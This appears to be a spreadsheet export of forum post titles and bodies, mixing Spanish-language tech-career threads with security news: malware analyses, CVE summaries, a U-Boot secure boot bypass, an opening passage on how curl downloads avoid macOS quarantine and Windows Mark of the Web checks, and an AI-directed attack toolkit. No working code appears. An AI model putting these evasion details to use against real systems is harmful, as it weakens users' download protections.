Terminal window arrives with nothing on it. Which takes the whole chain with it. The first-run Gatekeeper path is triggered by quarantine, so no attribute means no notarization check and no "downloaded from the internet" dialog. Other execution-time checks still run, XProtect among them, but the provenance gate specifically doesn't. kMDItemWhereFroms is no help either, since it's written by the same download machinery. So it isn't that this defeats Gatekeeper. Gatekeeper never gets invited. Then I stopped guessing and tested it Curl-fetched file, xattr -l prints nothing at all. Not just no quarantine, no extended attributes of any kind. A browser download on the same box in the same session comes back with com.apple.quarantine: 0081;6a8973ff;Chrome; and a full WhereFroms plist, so the null is real rather than me holding the tool wrong. One thing I didn't expect. Extended attributes survive curl -o overwriting an existing path. The content gets replaced, the quarantine attribute stays, still naming whatever a browser fetched there previously. So an attribute can outlive the bytes it described, which cuts against me in the other direction too. Absence proves nothing, and presence isn't necessarily describing the file you're looking at. Windows has the same hole Mark of the Web works the same way. Zone.Identifier is an alternate data stream written by the downloading application through the zone API, not by the OS. Tested that as well, and the first run was garbage. The VM had SaveZoneInformation = 1 in both hives, which switches MotW off machine-wide, so everything came back clean including the browser control. Cleared the policy, </t>
  </si>
  <si>
    <t>C-050</t>
  </si>
  <si>
    <t>9 meses buscando laburo como dev .NET: reclutadores impresentables, ghosting y un mercado que es una basura. Un descargo sincero.</t>
  </si>
  <si>
    <t>Buenas a todos. Necesito hacer un descargo porque sinceramente ya no doy más de la bronca y la impotencia. Llevo 9 meses buscando trabajo como desarrollador .NET fullstack. Nueve meses de levantarme todos los días a la misma rutina: mandar CVs, postularme en LinkedIn, Indeed, Zonajobs y cuanta plataforma exista. Cambié el CV mil veces, de todas las formas que se les ocurran, y la historia es siempre la misma. La verdad es que en todo este tiempo me di cuenta de una sola cosa: a la gente de RRHH/Recruiting le importa absolutamente nada tu tiempo. Te clavan un ghosting cósmico después de 3 o 4 instancias de entrevista. Te pausan las vacantes en la cara después de hacerte perder horas haciendo pruebas técnicas o hablando con psicotécnicos. Le mandás un mensaje educado para preguntar cómo sigue el proceso y ni siquiera son capaces de contestarte con un "elegimos a otro". Nada. Silencio absoluto. Al principio intentaba entenderlos, decía "bueno, tendrán mucho trabajo", pero hoy ya me da una bronca terrible. Si no es problema de ellos, no les calienta si estás del otro lado esperando o si dependés de un laburo para vivir. Estoy re podrido de la rutina diaria de enviar toneladas de CV para que no me responda casi nadie, o tener entrevistas que al final quedan en la nada misma. Te quema la cabeza, te liquida la salud mental y te hace sentir que estás pedaleando en el aire. Ya no sé qué más hacer. A alguien más le pasa esta desorganización y falta de respeto total del mercado? Cómo hacen para no volverse locos cuando llevan tanto tiempo en esta calesita? [link] [comments]</t>
  </si>
  <si>
    <t>C-051</t>
  </si>
  <si>
    <t>Magento StyleSmuggler RCE: Report Poisoning to Code Execution</t>
  </si>
  <si>
    <t>C-052</t>
  </si>
  <si>
    <t>Consultor it</t>
  </si>
  <si>
    <t>Buenas gorditos, quería consultar con ustedes la situación que estoy viviendo y si a alguien le pasó . Después de varios trabajos encontré uno como soporte it remoto, quería uno así y me gusta resolver. La verdad que no me gusta para nada tratar con clientes pero bueno encontré un poco el equilibrio. El problema es que me pasaron hace unos meses a consultoría it porque tengo conocimiento de sql. El tema es que ahora es muchísimo más hablar con clientes, requerimientos, idas y vueltas. y tengo una jefa que es ultra negativa pero por todo y es cuestión de levantarme todos los días y tener un mensaje de ella de problemas que hice esto o lo otro o no llegamos. Me está haciendo el trabajo imposible la verdad. Me gustaría pasarme a soporte de vuelta pero como falta gente acá y que cumpla con cositas de bd no me van a pasar de vuelta. También la organización que tienen es malísima pero bueno, investigar y resolver algunos problemas me gustaba mucho más. Que harían? [link] [comments]</t>
  </si>
  <si>
    <t>C-053</t>
  </si>
  <si>
    <t>New analysis VioletWorm and Essential MacOS Stealer</t>
  </si>
  <si>
    <t>C-054</t>
  </si>
  <si>
    <t>[RANT] Me tienen los huevos llenos de las los posts de apps vibecodeadas en el sub</t>
  </si>
  <si>
    <t>Hola, Soy Jorgito e hice una app que viene a solucionar un problema que tengo y que vos tambien podes vibecodear en una tarde Introducing PooTracker AI — la revolucionaria plataforma de gestión de deposiciones caninas impulsada por inteligencia artificial de última generación. ¿Cansado de no saber exactamente a qué hora tu perro hace caca? ¿Perdés horas de productividad porque no tenés data-driven insights sobre los movimientos intestinales de tu mascota? Yo también. Por eso construí esta solución game-changing en solo 4 horas con vibecode + Cursor + Claude 3.5 + un toque de magia. Features que van a cambiar tu vida (y la de tu perro): - Timestamp automático de cada “evento” con precisión de milisegundos - Análisis predictivo de patrones de defecación usando machine learning - Dashboard en tiempo real con gráficos de “consistencia vs. hora del día” - Notificaciones smart cuando detecta que “está por pasar” - Integración con Apple Health / Google Fit para sincronizar el gut microbiome de tu perrito - Modo “Family Sharing” para que toda la familia sepa quién limpió el último Built with ❤️, Next.js, Supabase, y un prompt que le escribí a la IA a las 2 AM. Si yo pude, vos también. El código está open-source. Forkealo, vibecodealo, y solucioná problemas que nadie te pidió. Link en bio 🚀 #BuildInPublic #VibeCoding #AI #DogTech #PooTracker #IndieHacker #Solopreneur #AIApps #NoCode #LowCode #Perros #CacaTracker #GameChanger P.D Lee la primera regla la vibecodeada concha de tu madre [link] [comments]</t>
  </si>
  <si>
    <t>C-055</t>
  </si>
  <si>
    <t>Cambié de compañia de wifi y ahora la pc se me buguea</t>
  </si>
  <si>
    <t>Buenas gente. Cambié de Telecentro a Fibertel 300MB, y ahora cada vez que abro el navegador, se pone a cargar y no para mas. A veces llego a youtube y a ver 3 segundos de un video, y a veces ni eso. Si me voy al menu de conexiones, se me recontra buguea el menu deja de responder, y se queda cargando sin parar. Si le doy a reiniciar, o apagar, la pantalla se queda en "Reiniciando", o en negro, por lo cual opto por apagarla manualmente. Tengo windows 11. Edit: le di a apagar, se quedo en negro durante 10 min, y se volvió a prender [link] [comments]</t>
  </si>
  <si>
    <t>C-056</t>
  </si>
  <si>
    <t>Free, hands-on 14-week university security course (open to anyone online)</t>
  </si>
  <si>
    <t>I wanted to share a great free resource for anyone trying to bridge the gap between basic theory and actual hands-on security skills. The Czech Technical University in Prague (specifically the Stratosphere Laboratory) runs an intensive, one-semester course called Introduction to Security (BSY) that starts this week. The class is being taught both physically at the university and broadcast online, so anyone can participate. Feel free to check the link for more details on the curriculum, prerequisites, and course structure. Registration is still open! [link] [comments]</t>
  </si>
  <si>
    <t>C-057</t>
  </si>
  <si>
    <t>Ask the Agent Nicely: Two Authorization Bypasses in n8n AI Agents</t>
  </si>
  <si>
    <t>C-058</t>
  </si>
  <si>
    <t>Arriesgar la tranquilidad?</t>
  </si>
  <si>
    <t>Buen día gente, estoy en un dilema de salto laboral. Trabajo actual: Corpo, sector infra, soy JR con 2.5 años aunque ya pedi recategorización y me patearon para mas adelante, 2m en mano, 2 días de presencialidad apuntando a ser mas. Mi trabajo es bastante tranquilo por lo que tengo varios ratos libres. Me ofrecieron: PYME de SaaS, puesto FinOps, bastante enquilombado quizas porque van a pasar todo a la nube. 1 solo día presencial, 3m netos. Me da cosa perder esa seguridad de la empresa grande, pero en el otro estaría yo solo y podría “explotar” mas me da la sensación, que opinan? [link] [comments]</t>
  </si>
  <si>
    <t>C-059</t>
  </si>
  <si>
    <t>Quiero orientarme a Ciberseguridad pero estoy en Ingeniería en Sistemas - ¿me recomiendan un camino?</t>
  </si>
  <si>
    <t>Hola! Estoy cursando primer año de Ingeniería en Sistemas de Información y la verdad estoy bastante mal con la carrera. No se me dan bien las materias básicas, son 5 años en total, tengo un viaje diario bastante largo hasta la facultad, estoy en un pozo depresivo, me siento desmotivada y encima quiero poder trabajar al mismo tiempo que estudio, cosa que con este ritmo se me hace prácticamente imposible. Lo que realmente me interesa es la ciberseguridad, pero no sé si seguir 5 años de ingeniería es el camino, o si conviene buscar algo más corto y específico (tecnicaturas, certificaciones) que me acerque más rápido a eso. De todas maneras cabe aclarar que las certificaciones las voy a hacer de todas formas, pero en la carrera que estoy actualmente no siento que puedo hacerlas al mismo tiempo que ingeniería. Mi familia tampoco está muy convencida de que deje la ingeniería, así que antes de tomar cualquier decisión quiero escuchar experiencias reales de gente que labure, se haya formado en el rubro o que tenga alguna recomendación. ¿Alguien que trabaje en ciberseguridad en Argentina me recomendaría algún camino en particular (carrera corta, certificación, o directamente terminar una ingeniería)? ¿Qué tan necesario es realmente el título de ingeniero para entrar al rubro? ¿Me conviene quedarme o cambiarme? Cualquier consejo u opinión sincera es bienvenida. [link] [comments]</t>
  </si>
  <si>
    <t>C-060</t>
  </si>
  <si>
    <t>FTP Banners: The New Dead Drop Resolver Delivering Novel RATs</t>
  </si>
  <si>
    <t>Security software has gotten pretty good at spotting when an infected computer tries to phone home to an obviously sketchy website. So hackers have started getting creative about where they hide those "check-in" instructions instead and researchers just found a batch of examples that are honestly kind of wild. Turns out one trick involves FTP, an old-school way computers transfer files. When your computer connects to an FTP server, it gets back a small greeting message first. Hackers have figured out how to bury malicious instructions directly inside that greeting no file transfer even has to happen. From there, the infected computer gets one of two newly discovered pieces of malware. One, nicknamed PINHOLE, looks up hidden web addresses tucked inside ordinary Pinterest pins and SurveyMonkey survey pages to find its real instructions. The other, called E4del, disguises itself as a legitimate, digitally signed copy of Discord and runs quietly in the background with no visible window, no sound, nothing that would tip someone off. The takeaway isn't that the malware itself is more sophisticated than usual. It's that attackers are getting more creative about hiding in plain sight, using everyday internet traffic that most security tools aren't paying close attention to. [link] [comments]</t>
  </si>
  <si>
    <t>C-061</t>
  </si>
  <si>
    <t>Fragnesia primitive via Open vSwitch. Deterministic local privilege escalation.</t>
  </si>
  <si>
    <t>This is a deterministic local privilege escalation affecting the default install of the latest Arch, Fedora, Debian, Amazon Linux and RHEL distributions, having unprivileged user namespaces enabled, openvswitch auto-loading, and a stock kernel carrying the Fragnesia fix. [link] [comments]</t>
  </si>
  <si>
    <t>C-062</t>
  </si>
  <si>
    <t>Si sos dev de Flow, te aviso que se rompio el modelo</t>
  </si>
  <si>
    <t>Que va que me sale una opcion nueva de "La ia elige tu pelicula" y ya esta rota Como punto positivo esta bueno no dejas al usuario escribirle directamente a la ia por lo que no te podrian inyectar prompts no deseados. Punto ahi https://preview.redd.it/qzqmqpfqixvh1.png?width=1920&amp;format=png&amp;auto=webp&amp;s=b94682d8dcb59f2ea5eddc82d5396426a4bd07ca No parece que la ia reciba una data de las cosas que uso previamente el usuario y solo se basa en lo que respondes, por la que la respuesta debe ser bastante vaga. Pero banco que se subieron al barco de ponerle ia a cualquier huevada Sldos [link] [comments]</t>
  </si>
  <si>
    <t>C-063</t>
  </si>
  <si>
    <t>Analyzing Flying Eagle Android RAT: APK Builder, C2 Panel, Banking Overlays, and a Successor Called Night Dragon</t>
  </si>
  <si>
    <t>Chinese Android RAT framework combining an APK builder with a full C2 device management panel. Lures impersonate Public Security Bureau apps, banking services, adult content platforms, and social media. Post-install capabilities include live screen viewing, SMS and photo gallery access, audio recording, camera capture, keylogging, payment credential capture, and phishing overlays for Alipay, WeChat, ICBC, Agricultural Bank, and crypto wallets TokenPocket and imToken. Source code was stolen in early 2026 according to Telegram channel messages, with nearly 200 customer databases taken at the same time. Two channels now distribute patched builds. Night Dragon launched June 23 as a likely successor, adding black-screen mode to hide operator activity behind fake system update screens and automatic icon hiding post-install. SHA-256 hashes and full IOC tables in the report: https://hunt.io/blog/flying-eagle-android-rat-170-servers-night-dragon [link] [comments]</t>
  </si>
  <si>
    <t>C-064</t>
  </si>
  <si>
    <t>vx-underground says GitHub banned its account and removed its malware-code archive — RuntimeWire</t>
  </si>
  <si>
    <t>C-065</t>
  </si>
  <si>
    <t>Necesito una mano!</t>
  </si>
  <si>
    <t>Hola buenas noches, me pasa lo siguiente, instale una tickeadora en una maquina de vales, la cual tiene una conexión RDP para el servidor en el cual ingresa al sistema, en donde se conectan 6 usuarios, el usuario de vale puede imprimir en la maquina de valores desde el sistema (que me costo horrores) pero ahora 2 usuarios me imprimen el listado en formato tickets y no en la impresora donde debe, alguno me podria dar una mano para redirigir las cosas? este todo conectado plug and play, y el sistema es muy escenario a la hora de las opciones, ya que no tiene un menú integrado dentro del sistema para seleccionar las impresoras, es todo por tsprint [link] [comments]</t>
  </si>
  <si>
    <t>C-066</t>
  </si>
  <si>
    <t>A real Carnival Cruise Line email was serving customers malware</t>
  </si>
  <si>
    <t>C-067</t>
  </si>
  <si>
    <t>ASUS bsitf.sys (CVE-2026-13585): Arbitrary Physical Memory Mapping 0-day writeup + PoC</t>
  </si>
  <si>
    <t>C-068</t>
  </si>
  <si>
    <t>45% of credential-phishing pages weren't on Google Safe Browsing when first seen; 29% still weren't after a week</t>
  </si>
  <si>
    <t>C-069</t>
  </si>
  <si>
    <t>¿Quien de ustedes fue gordos?</t>
  </si>
  <si>
    <t>C-070</t>
  </si>
  <si>
    <t>Getting Agents to tell on themselves</t>
  </si>
  <si>
    <t>C-071</t>
  </si>
  <si>
    <t>Comparando experiencias trabajando en: Corpo vs Startup vs Consultora</t>
  </si>
  <si>
    <t>Hola. Quería saber sus experiencias trabajando en diferentes tipos de organizaciones. Arranco yo: - Corpo de 3000 empleados: No laburaba casi, muchas reuniones por momentos, me pagaban bien, pero tenia que negociar mi sueldo en ars, tenia compañeros que no lo hacian y bueno ganaban re poco, todos los beneficios de estar en blanco. Procesos muy prolijos, un poco gedes pero sirve para tomar unos mates. Esquema híbrido. Te achanchas técnicamente porque para cuando se actualizaron en la tecnología, esta quedó obsoleta. Mucho amiguismo para crecer, mucha burocracia. Mucho ñoqui. - Startup de producto: mi experiencia es trabajando contractor acá, MUCHO laburo a veces los fines de semana aunque, ganando en dólares, pero sin beneficios, te pueden pegar una patada en el culo sin un peso. Posibilidad de implementar tecnologías modernas, pocas reuniones. REMOTO. Eramos 4 gatos, laburé en otra startup donde eramos 70 y laburé a un ritmo mucho mas normal. Mucha desorganización. -Consultora: Solo tuve entrevistas, nunca trabajé en una, me han ofrecido buena guita. Conclusión: Está bueno laburar en startups para aprender, la corpo esta buena para jubilarse, vas a ver que hay mucha gente que está hace 10 años y no entendes porqué y cómo hace. Mucho amiguismo. [link] [comments]</t>
  </si>
  <si>
    <t>C-072</t>
  </si>
  <si>
    <t>about binary security/analysis - reverse engineering discord server</t>
  </si>
  <si>
    <t>https://preview.redd.it/beih70eqrm7h1.png?width=1845&amp;format=png&amp;auto=webp&amp;s=be255f18c081fed5ed8b7ff75887fe154054cc5f Hey everyone, We’re building a small community around binary security research, focused on things like: Reverse Engineering Binary Obfuscation / Deobfuscation Exploit Development Compiler / interpreters... Malware Analysis Binary Hardening research we also work on open source tools and experiments here: GitHub → BinaryHardening GitHub Discord → BinaryHardening Discord If low level stuff and weird binaries are ur thing, come join us Always happy to meet more RE people x86byte [link] [comments]</t>
  </si>
  <si>
    <t>C-073</t>
  </si>
  <si>
    <t>Proceso de contratación eterno.</t>
  </si>
  <si>
    <t>Buenas gente, vengo a pedirles opiniones o a ver si a alguien le pasó algo similar, porque la incertidumbre me está ganando. Estoy en un proceso para un puesto de QA Automation y la cosa se estiró de una forma rara. Pasé por todas las entrevistas y llegué hasta la Etapa 4, que era un challenge técnico bastante completo (armar plan de pruebas, reporte de bugs y montar la suite automatizada con Playwright). El lunes 28 de septiembre tuve una última llamada defendiendo la entrega de todo este trabajo. A partir de ahí, quedé en un limbo. Para saber en qué andaba el tema, les escribí el viernes pasado y volví a consultar ayer (siempre manteniendo un tono súper educado y neutral para demostrar interés sin meter presión). La respuesta fue que todavía no había novedades, pero que el de RRHH iba a "pushear" sobre el tema internamente para conseguirme una respuesta. Acá viene lo que más me desconcierta: en el medio de todo esto, el de RRHH me hizo preguntas financieras, consultándome específicamente si yo ya facturaba para Estados Unidos o no. En lo personal, considero que esas preguntas tan específicas sobre facturación se hacen después de haber presentado una oferta, o cuando ya es inminente, no cuando la respuesta oficial es que "no hay novedades". A esta altura ya no sé cómo leer la situación. ¿Creen que me tienen en el banco de suplentes por si se les cae el candidato principal? ¿Es normal que pregunten temas de facturación a USA antes de siquiera confirmar si pasaste la defensa del challenge? Cualquier experiencia o perspectiva me sirve para bajar la ansiedad. Gracias [link] [comments]</t>
  </si>
  <si>
    <t>C-074</t>
  </si>
  <si>
    <t>RCE and bad crypto in Internxt's 'post-quantum' cloud storage</t>
  </si>
  <si>
    <t>Internxt is a post-quantum secure encrypted cloud storage provider which is open-source and has passed multiple independent audits. I reviewed their code and found that post-quantum security should have been the least of their problems. Clicking a link in your browser could trigger remote code execution on the desktop app or leak your long-term encryption keys to an attacker-chosen URL. Their cryptographic architecture stands on shaky grounds with public keys never being verified, in some cases man-in-the-middled by design, a flat key hierarchy and a KDF with just 3 iterations of MD5. We need PQC and we need it now, but adding a (self-rolled) PQC hybrid on top of a weak protocol does not make it more secure. [link] [comments]</t>
  </si>
  <si>
    <t>C-075</t>
  </si>
  <si>
    <t>hackearon el sitio oficial de la fundacion altos estudios en ciencias comerciales</t>
  </si>
  <si>
    <t>estoy viendo carreras para estudiar en año que viene y entro al sitio de esta universidad y aparece algo de casinos, lo raro es que la institucion no informo nada [link] [comments]</t>
  </si>
  <si>
    <t>C-076</t>
  </si>
  <si>
    <t>Diseño UX/UI</t>
  </si>
  <si>
    <t>C-077</t>
  </si>
  <si>
    <t>One Android Loader, Four Malicious APKs: Linking Challan and Gas Phishing to BTMOB</t>
  </si>
  <si>
    <t>C-078</t>
  </si>
  <si>
    <t>Migrar de Android a Android Multiplataforma</t>
  </si>
  <si>
    <t>Buenas! Mas alla de la idea el tema es asi: Tengo una app funcional pero solo en android mi idea es migrar a kotlin multiplataform Para ir sabiendo - Si tuvieron una exp similar y como le fue? - Que ideas o propuestas realizaron? Mi idea es usar spec en integraciones actuales, separar lo que si o si necesita una libreria especifica e ir renegando en cada "merge" [link] [comments]</t>
  </si>
  <si>
    <t>C-079</t>
  </si>
  <si>
    <t>Consulta IA local</t>
  </si>
  <si>
    <t>C-080</t>
  </si>
  <si>
    <t>Visual Creepypasta malware scavenger hunt</t>
  </si>
  <si>
    <t>C-081</t>
  </si>
  <si>
    <t>Bypassing Secure Boot via Unbounded RLE8 Splash Images in U-Boot (CVE-2026-71972)</t>
  </si>
  <si>
    <t>When analysing firmware attack surfaces, image decoders built into bootloaders get less scrutiny than cryptographically verified OS kernels. If image parsing happens before signature verification, any memory corruption in the parser breaks the secure boot trust model. researchers analysed U-Boot's video subsystem (drivers/video/video_bmp.c) and identified an unbounded write in the RLE8 bitmap decoder (video_display_rle8_bitmap()) that leads to a pre-authentication Secure Boot bypass. Root Cause and Vulnerability Mechanics When U-Boot displays a boot logo or splash screen, it parses a BMP image loaded from local storage (SPI flash, MMC/eMMC, USB, or SD card). Unbounded framebuffer write: During RLE8 decompression, video_display_rle8_bitmap() decodes run-length encoded streams directly into the active framebuffer without validating stream bounds against the frame boundary or allocated buffer size. Pre-authentication execution window: In many embedded target configurations, the boot splash screen is rendered immediately on startup, before U-Boot calls Android Verified Boot (AVB) or FIT image signature verification routines. Storage disparity: The kernel image and rootfs are signed, but splash images are frequently stored in unsigned, user-writable partitions or external media. An attacker who writes a crafted RLE8 BMP to the boot storage can trigger an out-of-bounds write past the framebuffer during early boot, corrupting adjacent bootloader data structures, function pointers, or verification flags in memory. This hijacks the execution flow before signature checking completes. [link] [comments]</t>
  </si>
  <si>
    <t>C-082</t>
  </si>
  <si>
    <t>Here We Go Again (Citrix NetScaler DTLS Preauth Memory Overflow CVE-2026-88772) - watchTowr Labs</t>
  </si>
  <si>
    <t>C-083</t>
  </si>
  <si>
    <t>Alguna vez hiciste una relocalizacion por la empresa? como funciona esa movida?</t>
  </si>
  <si>
    <t>trabajo en una empresa aca en caba y tiene muchas oficinas en el mundo, yo habia puesto que estaba abierto a la posibilidad de relocalizarme, pero siempre me pregunte. Como funciona usualmente estas movidas? tienen algun caso asi? [link] [comments]</t>
  </si>
  <si>
    <t>C-084</t>
  </si>
  <si>
    <t>¿Qué siguieron después de terminar una Tecnicatura en Programación?</t>
  </si>
  <si>
    <t>Buenas, terminé una Tecnicatura Universitaria en Programación en la U.T.N y actualmente trabajo como desarrollador. Quiero continuar estudiando para complementar mi experiencia con una buena base académica, pero todavía estoy evaluando qué camino tendría más sentido. Me interesan especialmente los datos y la inteligencia artificial, por lo que estoy considerando una Licenciatura en Análisis y Gestión de Datos. También pensé en Sistemas, Informática, alguna carrera orientada a IA o incluso algo relacionado con electrónica y automatización. Mi duda es si vale la pena comenzar una carrera larga o buscar un ciclo de complementación que reconozca parte de la tecnicatura y después especializarme mediante cursos, certificaciones y proyectos. Para quienes terminaron una tecnicatura similar: ¿Qué carrera o especialización siguieron? ¿Les reconocieron equivalencias? ¿Sintieron que la carrera de grado complementó realmente lo aprendido? ¿Les abrió nuevas oportunidades laborales? ¿Eligieron Sistemas, Informática, Datos, IA, Ciberseguridad u otra rama? ¿Volverían a tomar la misma decisión? ¿Qué le recomendarían a alguien que ya trabaja como desarrollador? Me interesan especialmente experiencias reales, tanto de quienes continuaron una licenciatura o ingeniería como de quienes decidieron concentrarse en experiencia laboral, inglés, certificaciones y proyectos. [link] [comments]</t>
  </si>
  <si>
    <t>C-085</t>
  </si>
  <si>
    <t>CVE-2026-108082: Symfony ReDoS. One request. Seconds of CPU</t>
  </si>
  <si>
    <t>If you run Laravel (or anything on Symfony), read this. CVE-2026-108082: one unauthenticated GET, seconds of backend CPU, ~100 requests and the app times out. A dumb ReDoS that common config turns into a real DoS. 👀⤵️ [link] [comments]</t>
  </si>
  <si>
    <t>C-086</t>
  </si>
  <si>
    <t>Venta de sistemas</t>
  </si>
  <si>
    <t>Alguno puede contar experiencias creando software y vendiendoselo a empresas/clientes de forma autónoma? Es decir, crearon algo y lo venden sea mediante suscripción o pago único. [link] [comments]</t>
  </si>
  <si>
    <t>C-087</t>
  </si>
  <si>
    <t>naming functions in a stripped binary by behavior, not byte signatures</t>
  </si>
  <si>
    <t>strip --strip-all a binary and this still names functions by micro-executing them and matching the effect trace against a corpus. spot check: zlib corpus vs a fully stripped O0 build, it named 9 functions and all 9 were right, and it stays quiet on the ones it isn't sure about (no confident garbage on thunks). where byte sigs (FLIRT) die on recompile and CFG diffing gets fragile across opt levels, behavior holds up better. optimized-vs-optimized is still the hard case, i'm honest about that in the numbers. x86-64 only atm. https://github.com/1rhino2/fnprint [link] [comments]</t>
  </si>
  <si>
    <t>C-088</t>
  </si>
  <si>
    <t>[Looking fo Beta Readers] [21k Novella][Cyberpunk Detective Buddy Comedy] Baxter Dot Com</t>
  </si>
  <si>
    <t>C-089</t>
  </si>
  <si>
    <t>Physhing desde el mismo número donde llegan los códigos OTP?</t>
  </si>
  <si>
    <t>C-090</t>
  </si>
  <si>
    <t>Globant vuelve de lleno a la presencialidad obligatoria a partir del 26/10</t>
  </si>
  <si>
    <t>Globant le comunico a todos que en Argentina desde el 26/10/2026 la vuelta a la oficina es de forma obligatoria. [link] [comments]</t>
  </si>
  <si>
    <t>C-091</t>
  </si>
  <si>
    <t>CVE-2025-13032: Entering and Breaking the Avast Antivirus Sandbox Part 2</t>
  </si>
  <si>
    <t>C-092</t>
  </si>
  <si>
    <t>Playing It SFAPE: Code Execution in Isolated User Mode</t>
  </si>
  <si>
    <t>Doyensec discovered multiple vulnerabilities in SFAPE.dll, a VBS enclave shipped with Windows, and chained them to gain code execution within the enclave in Windows Isolated User Mode (VTL1). The post explores how VBS enclaves work and how memory corruption can undermine their isolation guarantees. Microsoft addressed the reported issue in the September 2026 bulletin under CVE-2026-83498. [link] [comments]</t>
  </si>
  <si>
    <t>C-093</t>
  </si>
  <si>
    <t>Inside a PaperCut attacker’s AI toolkit: custom Rust collectors, chisel persistence, and AI-directed exploitation using 25 concurrent agents</t>
  </si>
  <si>
    <t>Three open directories on the PaperCut campaign server exposed the operator's full toolkit. The tooling included four custom Rust Windows binaries for LSA secret collection and registry hive dumping, Python scripts for offline NT hash recovery and service credential parsing, and a chisel-based Linux persistence mechanism with cron. The exploit framework had three variants targeting different PaperCut versions, with version auto-detection and automatic cleanup of modified config values after each run. The whole operation was orchestrated by a DeepSeek AI model through the OpenAI Codex harness, with a 19KB instruction file directing up to 25 concurrent subagents. MD5 hashes and full analysis: https://hunt.io/blog/papercut-attacker-ai-toolkit-exploit-code-second-rce [link] [comments]</t>
  </si>
  <si>
    <t>C-094</t>
  </si>
  <si>
    <t>Recuperación de mercado para perfiles senior</t>
  </si>
  <si>
    <t>Después de leer varios foros tanto nacionales como gringos mucha gente coincide en que hay una recuperación de ofertas laborales para personas experimentadas Personalmente hace mucho que no tomo entrevistas, pero quería consultar para los que buscan activamente si coinciden con esta afirmación Mucho ruido y pocas nueces? Es la época del año? Muchas ofertas medio pelo? Muchas exigencias innecesarias? Cada aporte es válido [link] [comments]</t>
  </si>
  <si>
    <t>C-095</t>
  </si>
  <si>
    <t>Aplicar a cualquier stack siendo senior con IA?</t>
  </si>
  <si>
    <t>Se me ocurrió esto ya que en todos lados se anda ventilando que la IA les hace todo el laburo y ellos solo le hacen de niñera. Comenten si alguno lo intentó. Siendo que ahora los agentes hacen casi todo, y nosotros solo le damos instrucciones y (en alguno casos ni siquiera) revisar el codigo y aprobar. No probaron aplicar a un laburo donde su stack es algo que no tocaron en su vida? Por ejemplo si sos del palo front y te tiras a un puesto fullstack, o pasas de Node a Golang de un dia para el otro. Algunas empresas hasta estan orgullosas de decir que los devs ni miran el codigo que tiran a produccion, por que deberia importarles si tengo 5 años en ese stack en particular? Me tiran un ticket, lo paso por Claude, reviso dos segundos que no se rompa, zip zap terminé. Todo esto refiriendome a un Senior con años de experiencia, te podes manejar independientemente y aprender mas rapido, ademas de que los años en el CV le dan algo de peso. [link] [comments]</t>
  </si>
  <si>
    <t>C-096</t>
  </si>
  <si>
    <t>CVE-2026-45756: attacker-controlled regex in Symfony JsonPath filters (ReDoS)</t>
  </si>
  <si>
    <t>C-097</t>
  </si>
  <si>
    <t>Photo Disorganization/Loss</t>
  </si>
  <si>
    <t>C-098</t>
  </si>
  <si>
    <t>Tips de inglés para devs y profes de devs</t>
  </si>
  <si>
    <t>Buenas, tengo un rato al pedo y quería compartir algunos tips que me fueron muy útiles y fui aprendiendo en la marcha dando clases de inglés para devs. Para empezar, aclaro que nunca estudié inglés formalmente. Aprendí leyendo sobre temas que en su momento no estaban cubiertos por bibliografía en español y lo perfeccioné durante un período viviendo afuera. Me puse a aprender gramática en inglés al poco tiempo y me lancé a dar clases. Por un efecto bola de nieve y por cierta afinidad (me gusta mucho la tecnología aunque nunca trabajé formalmente en IT, y soy un gordo linuxerdo), los devs están entre mis principales clientes. Creo que algunas de estas cosas que aprendí fueron importantes en que les guste el servicio a algunos devs en particular, que fueron los principales responsables de que después llegue a conocidos suyos (el boca a boca, como en todo, es clave). Lo que menciono a continuación son cosas que pueden ayudar tanto al que da clases como al que está tomando (para hacer pedidos concretos a sus profes). 1) Tres tiempos verbales to rule them all Una buena parte de la gente que labura en IT busca clases de inglés para un motivo en particular: crecer laboralmente (ya sea laburando para afuera, o porque se los requirieron para una posición dada). En general, eso implica cierto apuro para poder llegar a expresarse mínimamente en inglés. Lo que yo llegué a entender con el tiempo (capaz si hubiese estudiado inglés formalmente lo hubiese entendido antes), es que mediante el presente simple, el presente continuo y el pasado simple, uno puede llegar a expresarse sobre una buena cantidad de cosas que resultan elementales (qué se hace cotidianamente, qué se hace en el presente inmediato y qué se hizo, por ejemplo). 2) Hablar de la rutina es clave, y debería ser una parte considerable de todas las clases El hablar de lo que se hace en la jornada laboral es una de las cosas más importantes que se puede hacer. Colateralmente, se adquiere vocabulario que es valioso para entender lo que se hace, pero también para poder transmitirlo. Refuerza en buena medida lo dicho al final del punto anterior. Por su parte, muchos estudiantes lo agradecen como "terapéutico" y fortalece el vínculo. La clase se vuelve algo más que una clase para el alumno y eso está muy piola y ayuda a que dure. 3) Presentarse a sí mismo laboralmente como si de una entrevista se tratara debería ser una actividad recurrente Es muy difícil preparar una entrevista de un día para otro, y los nervios juegan incluso en la preparación. Hacer estas prácticas sin una obligación encima es casi siempre lo mejor a lo que se puede apuntar. 4) Hay una bocha de material de reading disponible Portales de noticias sobre tecnología, las publicaciones que hacen los gigantes tech (ahora son todos ensayistas, hijos de puta), y hasta documentación de determinadas herramientas o tecnologías están al alcance. El problema acá puede ser que el docente no entienda tanto del material, pero que el alumno salga él mis</t>
  </si>
  <si>
    <t>C-099</t>
  </si>
  <si>
    <t>Cracked open the Google IPTV malware APK and found its C2 domain</t>
  </si>
  <si>
    <t>C-100</t>
  </si>
  <si>
    <t>The Gentlemen Ransomware Analysis: Go Obfuscated</t>
  </si>
  <si>
    <t>C-101</t>
  </si>
  <si>
    <t>Consejos - Propuesta de trabajo</t>
  </si>
  <si>
    <t>Buenas gente, espero esten bien. Hace unos pocos dias, me escribieron por linkedin ofreciendome una oportunidad algo similar a lo que hago ahora (un hibrido entre funcional y desarrollador) La cuestion es que es es como un 30% mas de lo que gano hoy y es 100% remoto. Hoy voy a la oficina. Aunque por ahi te dan la opcion de remoto (ocasionalmente) Me gusta donde estoy ahora, por la gente y el ambiente, pero me sirve la plata y el remoto full. ¿que harian ustedes? Hoy gano 1.400.000 neto. Pasaria a 1.800.000 [link] [comments]</t>
  </si>
  <si>
    <t>C-102</t>
  </si>
  <si>
    <t>HallWatch: Usermode indirect syscall detection</t>
  </si>
  <si>
